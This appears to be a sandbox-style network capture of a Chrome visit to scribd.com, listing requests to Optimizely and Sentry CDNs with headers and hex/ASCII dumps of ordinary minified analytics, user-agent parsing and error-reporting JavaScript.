                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:35 UTC2609INData Raw: 6f 6d 6d 5f 74 6f 74 61 6c 76 61 6c 75 65 22 29 3b 74 68 69 73 2e 6d 61 70 47 74 6d 55 61 73 50 72 6f 64 75 63 74 73 28 6e 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 75 61 5f 65 22 3a 74 68 69 73 2e 6d 61 70 47 74 6d 45 63 6f 6d 6d 65 72 63 65 50 75 72 63 68 61 73 65 28 6e 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 67 61 34 22 3a 74 68 69 73 2e 72 65 70 6c 61 63 65 47 74 6d 50 61 72 61 6d 28 6e 2c 22 76 61 6c 75 65 22 2c 22 65 76 65 6e 74 5f 76 61 6c 75 65 22 29 3b 74 68 69 73 2e 6d 61 70 47 74 6d 47 61 34 49 74 65 6d 73 28 6e 29 7d 72 65 74 75 72 6e 20 6e 7d 3b 76 61 72 20 74 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 55 72 6c 43 68 61 6e 67 65 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: omm_totalvalue");this.mapGtmUasProducts(n);break;case"ua_e":this.mapGtmEcommercePurchase(n);break;case"ga4":this.replaceGtmParam(n,"value","event_value");this.mapGtmGa4Items(n)}return n};var t=window.location.href;this.documentUrlChanged=function(){var n=


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        75192.168.2.1649811104.18.66.574436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC533OUTGET /js/24721610109.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: cdn.optimizely.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC912INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-id-2: jjDrkO3HrkL3LE0ehUTFkCYpqH14NOAExteOT1r9y/j0XW7tXtUFcKMU5Y+TSR13kAGBnrqxVsA=
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-request-id: Z11EN8394BVCPVW0
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 08 Apr 2024 17:28:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: W/"88eb0e8bbc3ee04a636d2dbce188f7b1"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=120
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-revision: 66
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-pci_enabled: False
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-version-id: 9s676eP9c0ikQFFQGSc47bWvXDbXnAPM
                                                                                                                                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                                                                                                        Age: 594
                                                                                                                                                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: x-amz-meta-revision
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                        CF-RAY: 8edf8b3a6b84425c-EWR
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC457INData Raw: 33 38 62 38 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 63 6c 69 65 6e 74 2e 6d 69 6e 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 73 5f 5f 3d 7b 37 35 38 34 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 65 29 7b 76 61 72 20 69 3b 21 66 75 6e 63 74 69 6f 6e 28 72 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 22 66 75 6e 63 74 69 6f 6e 22 2c 75 3d 22 75 6e 64 65 66 69 6e 65 64 22 2c 63 3d 22 6f 62 6a 65 63 74 22 2c 73 3d 22 73 74 72 69 6e 67 22 2c 66 3d 22 6d 6f 64 65 6c 22 2c 6c 3d 22 6e 61 6d 65 22 2c 64 3d 22 74 79 70 65 22 2c 76 3d 22 76 65 6e 64 6f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 38b8/*! For license information please see client.min.js.LICENSE.txt */(function(){var __webpack_modules__={7584:function(n,t,e){var i;!function(r,o){"use strict";var a="function",u="undefined",c="object",s="string",f="model",l="name",d="type",v="vendo
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1369INData Raw: 22 2c 43 3d 22 4d 6f 74 6f 72 6f 6c 61 22 2c 4f 3d 22 4f 70 65 72 61 22 2c 78 3d 22 53 61 6d 73 75 6e 67 22 2c 50 3d 22 53 68 61 72 70 22 2c 4d 3d 22 53 6f 6e 79 22 2c 4c 3d 22 58 69 61 6f 6d 69 22 2c 56 3d 22 5a 65 62 72 61 22 2c 46 3d 22 46 61 63 65 62 6f 6f 6b 22 2c 55 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 74 3d 7b 7d 2c 65 3d 30 3b 65 3c 6e 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 74 5b 6e 5b 65 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 5d 3d 6e 5b 65 5d 3b 72 65 74 75 72 6e 20 74 7d 2c 7a 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 6e 3d 3d 3d 73 26 26 2d 31 21 3d 3d 6a 28 74 29 2e 69 6e 64 65 78 4f 66 28 6a 28 6e 29 29 7d 2c 6a 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ",C="Motorola",O="Opera",x="Samsung",P="Sharp",M="Sony",L="Xiaomi",V="Zebra",F="Facebook",U=function(n){for(var t={},e=0;e<n.length;e++)t[n[e].toUpperCase()]=n[e];return t},z=function(n,t){return typeof n===s&&-1!==j(t).indexOf(j(n))},j=function(n){return
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1369INData Raw: 5c 2f 28 5b 2d 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 6f 70 65 72 61 29 28 3f 3a 2e 2b 76 65 72 73 69 6f 6e 5c 2f 7c 5b 5c 2f 20 5d 2b 29 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 6c 2c 68 5d 2c 5b 2f 6f 70 69 6f 73 5b 5c 2f 20 5d 2b 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 68 2c 5b 6c 2c 22 4f 70 65 72 61 20 4d 69 6e 69 22 5d 5d 2c 5b 2f 5c 62 6f 70 72 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 68 2c 5b 6c 2c 4f 5d 5d 2c 5b 2f 28 6b 69 6e 64 6c 65 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 6c 75 6e 61 73 63 61 70 65 7c 6d 61 78 74 68 6f 6e 7c 6e 65 74 66 72 6f 6e 74 7c 6a 61 73 6d 69 6e 65 7c 62 6c 61 7a 65 72 29 5b 5c 2f 20 5d 3f 28 5b 5c 77 5c 2e 5d 2a 29 2f 69 2c 2f 28 61 76 61 6e 74 20 7c 69 65 6d 6f 62 69 6c 65 7c 73 6c 69 6d 29 28 3f 3a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: \/([-\w\.]+)/i,/(opera)(?:.+version\/|[\/ ]+)([\w\.]+)/i],[l,h],[/opios[\/ ]+([\w\.]+)/i],[h,[l,"Opera Mini"]],[/\bopr\/([\w\.]+)/i],[h,[l,O]],[/(kindle)\/([\w\.]+)/i,/(lunascape|maxthon|netfront|jasmine|blazer)[\/ ]?([\w\.]*)/i,/(avant |iemobile|slim)(?:
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1369INData Raw: 6c 75 73 7c 73 61 6d 73 75 6e 67 7c 73 61 69 6c 66 69 73 68 7c 68 75 61 77 65 69 29 62 72 6f 77 73 65 72 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 5b 6c 2c 2f 28 2e 2b 29 2f 2c 22 24 31 20 42 72 6f 77 73 65 72 22 5d 2c 68 5d 2c 5b 2f 28 63 6f 6d 6f 64 6f 5f 64 72 61 67 6f 6e 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 5b 6c 2c 2f 5f 2f 67 2c 22 20 22 5d 2c 68 5d 2c 5b 2f 28 65 6c 65 63 74 72 6f 6e 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 20 73 61 66 61 72 69 2f 69 2c 2f 28 74 65 73 6c 61 29 28 3f 3a 20 71 74 63 61 72 62 72 6f 77 73 65 72 7c 5c 2f 28 32 30 5c 64 5c 64 5c 2e 5b 2d 5c 77 5c 2e 5d 2b 29 29 2f 69 2c 2f 6d 3f 28 71 71 62 72 6f 77 73 65 72 7c 62 61 69 64 75 62 6f 78 61 70 70 7c 32 33 34 35 45 78 70 6c 6f 72 65 72 29 5b 5c 2f 20 5d 3f 28
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: lus|samsung|sailfish|huawei)browser\/([\w\.]+)/i],[[l,/(.+)/,"$1 Browser"],h],[/(comodo_dragon)\/([\w\.]+)/i],[[l,/_/g," "],h],[/(electron)\/([\w\.]+) safari/i,/(tesla)(?: qtcarbrowser|\/(20\d\d\.[-\w\.]+))/i,/m?(qqbrowser|baiduboxapp|2345Explorer)[\/ ]?(
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1369INData Raw: 2f 65 6b 69 6f 68 66 2e 2b 28 66 6c 6f 77 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 73 77 69 66 74 66 6f 78 29 2f 69 2c 2f 28 69 63 65 64 72 61 67 6f 6e 7c 69 63 65 77 65 61 73 65 6c 7c 63 61 6d 69 6e 6f 7c 63 68 69 6d 65 72 61 7c 66 65 6e 6e 65 63 7c 6d 61 65 6d 6f 20 62 72 6f 77 73 65 72 7c 6d 69 6e 69 6d 6f 7c 63 6f 6e 6b 65 72 6f 72 7c 6b 6c 61 72 29 5b 5c 2f 20 5d 3f 28 5b 5c 77 5c 2e 5c 2b 5d 2b 29 2f 69 2c 2f 28 73 65 61 6d 6f 6e 6b 65 79 7c 6b 2d 6d 65 6c 65 6f 6e 7c 69 63 65 63 61 74 7c 69 63 65 61 70 65 7c 66 69 72 65 62 69 72 64 7c 70 68 6f 65 6e 69 78 7c 70 61 6c 65 6d 6f 6f 6e 7c 62 61 73 69 6c 69 73 6b 7c 77 61 74 65 72 66 6f 78 29 5c 2f 28 5b 2d 5c 77 5c 2e 5d 2b 29 24 2f 69 2c 2f 28 66 69 72 65 66 6f 78 29 5c 2f 28 5b 5c 77 5c 2e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /ekiohf.+(flow)\/([\w\.]+)/i,/(swiftfox)/i,/(icedragon|iceweasel|camino|chimera|fennec|maemo browser|minimo|conkeror|klar)[\/ ]?([\w\.\+]+)/i,/(seamonkey|k-meleon|icecat|iceape|firebird|phoenix|palemoon|basilisk|waterfox)\/([-\w\.]+)$/i,/(firefox)\/([\w\.
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1369INData Raw: 28 69 70 61 64 29 5c 64 5c 64 3f 2c 5c 64 5c 64 3f 5b 3b 5c 5d 5d 2e 2b 69 6f 73 2f 69 5d 2c 5b 66 2c 5b 76 2c 49 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 28 6d 61 63 69 6e 74 6f 73 68 29 3b 2f 69 5d 2c 5b 66 2c 5b 76 2c 49 5d 5d 2c 5b 2f 5c 62 28 73 68 2d 3f 5b 61 6c 74 76 7a 5d 3f 5c 64 5c 64 5b 61 2d 65 6b 6d 5d 3f 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 50 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 5c 62 28 28 3f 3a 61 67 5b 72 73 5d 5b 32 33 5d 3f 7c 62 61 68 32 3f 7c 73 68 74 3f 7c 62 74 76 29 2d 61 3f 5b 6c 77 5d 5c 64 7b 32 7d 29 5c 62 28 3f 21 2e 2b 64 5c 2f 73 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 6b 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 28 3f 3a 68 75 61 77 65 69 7c 68 6f 6e 6f 72 29 28 5b 2d 5c 77 20 5d 2b 29 5b 3b 5c 29 5d 2f 69 2c 2f 5c 62 28 6e 65 78 75 73 20 36 70 7c 5c 77
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (ipad)\d\d?,\d\d?[;\]].+ios/i],[f,[v,I],[d,_]],[/(macintosh);/i],[f,[v,I]],[/\b(sh-?[altvz]?\d\d[a-ekm]?)/i],[f,[v,P],[d,m]],[/\b((?:ag[rs][23]?|bah2?|sht?|btv)-a?[lw]\d{2})\b(?!.+d\/s)/i],[f,[v,k],[d,_]],[/(?:huawei|honor)([-\w ]+)[;\)]/i,/\b(nexus 6p|\w
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1369INData Raw: 69 2f 69 5d 2c 5b 66 2c 5b 76 2c 4e 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 28 69 64 65 61 74 61 62 5b 2d 5c 77 20 5d 2b 29 2f 69 2c 2f 6c 65 6e 6f 76 6f 20 3f 28 73 5b 35 36 5d 30 30 30 5b 2d 5c 77 5d 2b 7c 74 61 62 28 3f 3a 5b 5c 77 20 5d 2b 29 7c 79 74 5b 2d 5c 64 5c 77 5d 7b 36 7d 7c 74 62 5b 2d 5c 64 5c 77 5d 7b 36 7d 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4c 65 6e 6f 76 6f 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 28 3f 3a 6d 61 65 6d 6f 7c 6e 6f 6b 69 61 29 2e 2a 28 6e 39 30 30 7c 6c 75 6d 69 61 20 5c 64 2b 29 2f 69 2c 2f 6e 6f 6b 69 61 5b 2d 5f 20 5d 3f 28 5b 2d 5c 77 5c 2e 5d 2a 29 2f 69 5d 2c 5b 5b 66 2c 2f 5f 2f 67 2c 22 20 22 5d 2c 5b 76 2c 22 4e 6f 6b 69 61 22 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 28 70 69 78 65 6c 20 63 29 5c 62 2f 69 5d 2c 5b 66 2c 5b 76 2c 52
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: i/i],[f,[v,N],[d,m]],[/(ideatab[-\w ]+)/i,/lenovo ?(s[56]000[-\w]+|tab(?:[\w ]+)|yt[-\d\w]{6}|tb[-\d\w]{6})/i],[f,[v,"Lenovo"],[d,_]],[/(?:maemo|nokia).*(n900|lumia \d+)/i,/nokia[-_ ]?([-\w\.]*)/i],[[f,/_/g," "],[v,"Nokia"],[d,m]],[/(pixel c)\b/i],[f,[v,R
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1369INData Raw: 2c 22 41 63 65 72 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 3b 20 28 6d 5b 31 2d 35 5d 20 6e 6f 74 65 29 20 62 75 69 2f 69 2c 2f 5c 62 6d 7a 2d 28 5b 2d 5c 77 5d 7b 32 2c 7d 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4d 65 69 7a 75 22 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 28 62 6c 61 63 6b 62 65 72 72 79 7c 62 65 6e 71 7c 70 61 6c 6d 28 3f 3d 5c 2d 29 7c 73 6f 6e 79 65 72 69 63 73 73 6f 6e 7c 61 63 65 72 7c 61 73 75 73 7c 64 65 6c 6c 7c 6d 65 69 7a 75 7c 6d 6f 74 6f 72 6f 6c 61 7c 70 6f 6c 79 74 72 6f 6e 29 5b 2d 5f 20 5d 3f 28 5b 2d 5c 77 5d 2a 29 2f 69 2c 2f 28 68 70 29 20 28 5b 5c 77 20 5d 2b 5c 77 29 2f 69 2c 2f 28 61 73 75 73 29 2d 3f 28 5c 77 2b 29 2f 69 2c 2f 28 6d 69 63 72 6f 73 6f 66 74 29 3b 20 28 6c 75 6d 69 61 5b 5c 77 20 5d 2b 29 2f 69 2c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ,"Acer"],[d,_]],[/droid.+; (m[1-5] note) bui/i,/\bmz-([-\w]{2,})/i],[f,[v,"Meizu"],[d,m]],[/(blackberry|benq|palm(?=\-)|sonyericsson|acer|asus|dell|meizu|motorola|polytron)[-_ ]?([-\w]*)/i,/(hp) ([\w ]+\w)/i,/(asus)-?(\w+)/i,/(microsoft); (lumia[\w ]+)/i,
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1369INData Raw: 5d 2c 66 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 5c 62 28 6e 73 2d 3f 5c 77 7b 30 2c 39 7d 29 20 62 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 49 6e 73 69 67 6e 69 61 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 5c 62 28 28 6e 78 61 7c 6e 65 78 74 29 2d 3f 5c 77 7b 30 2c 39 7d 29 20 62 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4e 65 78 74 42 6f 6f 6b 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 5c 62 28 78 74 72 65 6d 65 5c 5f 29 3f 28 76 28 31 5b 30 34 35 5d 7c 32 5b 30 31 35 5d 7c 5b 33 34 36 39 5d 30 7c 37 5b 30 35 5d 29 29 20 62 2f 69 5d 2c 5b 5b 76 2c 22 56 6f 69 63 65 22 5d 2c 66 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 5c 62 28 6c 76 74 65 6c 5c 2d 29 3f 28 76 31 5b 31 32 5d 29 20 62 2f 69 5d 2c 5b 5b 76 2c 22 4c 76 54 65 6c 22 5d 2c 66 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 5c 62 28 70 68 2d 31 29 20 2f 69 5d 2c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ],f,[d,_]],[/\b(ns-?\w{0,9}) b/i],[f,[v,"Insignia"],[d,_]],[/\b((nxa|next)-?\w{0,9}) b/i],[f,[v,"NextBook"],[d,_]],[/\b(xtreme\_)?(v(1[045]|2[015]|[3469]0|7[05])) b/i],[[v,"Voice"],f,[d,m]],[/\b(lvtel\-)?(v1[12]) b/i],[[v,"LvTel"],f,[d,m]],[/\b(ph-1) /i],
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1369INData Raw: 6f 75 79 61 29 2f 69 2c 2f 28 6e 69 6e 74 65 6e 64 6f 29 20 28 5b 77 69 64 73 33 75 74 63 68 5d 2b 29 2f 69 5d 2c 5b 76 2c 66 2c 5b 64 2c 67 5d 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 3b 20 28 73 68 69 65 6c 64 29 20 62 75 69 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4e 76 69 64 69 61 22 5d 2c 5b 64 2c 67 5d 5d 2c 5b 2f 28 70 6c 61 79 73 74 61 74 69 6f 6e 20 5b 33 34 35 70 6f 72 74 61 62 6c 65 76 69 5d 2b 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 4d 5d 2c 5b 64 2c 67 5d 5d 2c 5b 2f 5c 62 28 78 62 6f 78 28 3f 3a 20 6f 6e 65 29 3f 28 3f 21 3b 20 78 62 6f 78 29 29 5b 5c 29 3b 20 5d 2f 69 5d 2c 5b 66 2c 5b 76 2c 44 5d 2c 5b 64 2c 67 5d 5d 2c 5b 2f 28 28 70 65 62 62 6c 65 29 29 61 70 70 2f 69 5d 2c 5b 76 2c 66 2c 5b 64 2c 79 5d 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 3b 20 28 67 6c 61 73 73
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ouya)/i,/(nintendo) ([wids3utch]+)/i],[v,f,[d,g]],[/droid.+; (shield) bui/i],[f,[v,"Nvidia"],[d,g]],[/(playstation [345portablevi]+)/i],[f,[v,M],[d,g]],[/\b(xbox(?: one)?(?!; xbox))[\); ]/i],[f,[v,D],[d,g]],[/((pebble))app/i],[v,f,[d,y]],[/droid.+; (glass


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        76192.168.2.1649813151.101.194.2174436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC569OUTGET /7.19.0/bundle.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: browser.sentry-cdn.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:35 UTC547INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 55680
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        Expires: Wed, 29 Oct 2025 08:29:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 10 Nov 2022 15:50:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: W/"991179f6b28b6971d59ce6e652d0432a"
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        X-GUploader-Response-Body-Transformations: gunzipped
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 1140730
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Server: Fastly
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:35 UTC1379INData Raw: 2f 2a 21 20 40 73 65 6e 74 72 79 2f 62 72 6f 77 73 65 72 20 37 2e 31 39 2e 30 20 28 31 38 31 38 34 38 33 29 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 67 65 74 73 65 6e 74 72 79 2f 73 65 6e 74 72 79 2d 6a 61 76 61 73 63 72 69 70 74 20 2a 2f 0a 76 61 72 20 53 65 6e 74 72 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 63 6f 6e 73 74 20 6e 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3b 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 73 77 69 74 63 68 28 6e 2e 63 61 6c 6c 28 74 29 29 7b 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 45 72 72 6f 72 5d 22 3a 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 45 78 63 65 70 74 69 6f 6e 5d 22 3a 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 44 4f 4d 45 78 63 65 70 74 69 6f 6e 5d 22 3a 72 65 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /*! @sentry/browser 7.19.0 (1818483) | https://github.com/getsentry/sentry-javascript */var Sentry=function(t){const n=Object.prototype.toString;function e(t){switch(n.call(t)){case"[object Error]":case"[object Exception]":case"[object DOMException]":ret
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:35 UTC1379INData Raw: 5b 5d 3b 6c 65 74 20 69 2c 73 2c 63 2c 75 2c 61 3b 69 66 28 21 65 7c 7c 21 65 2e 74 61 67 4e 61 6d 65 29 72 65 74 75 72 6e 22 22 3b 72 2e 70 75 73 68 28 65 2e 74 61 67 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 63 6f 6e 73 74 20 66 3d 6e 26 26 6e 2e 6c 65 6e 67 74 68 3f 6e 2e 66 69 6c 74 65 72 28 28 74 3d 3e 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 29 29 2e 6d 61 70 28 28 74 3d 3e 5b 74 2c 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 5d 29 29 3a 6e 75 6c 6c 3b 69 66 28 66 26 26 66 2e 6c 65 6e 67 74 68 29 66 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 72 2e 70 75 73 68 28 60 5b 24 7b 74 5b 30 5d 7d 3d 22 24 7b 74 5b 31 5d 7d 22 5d 60 29 7d 29 29 3b 65 6c 73 65 20 69 66 28 65 2e 69 64 26 26 72 2e 70 75 73 68 28 60 23 24 7b 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: [];let i,s,c,u,a;if(!e||!e.tagName)return"";r.push(e.tagName.toLowerCase());const f=n&&n.length?n.filter((t=>e.getAttribute(t))).map((t=>[t,e.getAttribute(t)])):null;if(f&&f.length)f.forEach((t=>{r.push(`[${t[0]}="${t[1]}"]`)}));else if(e.id&&r.push(`#${e
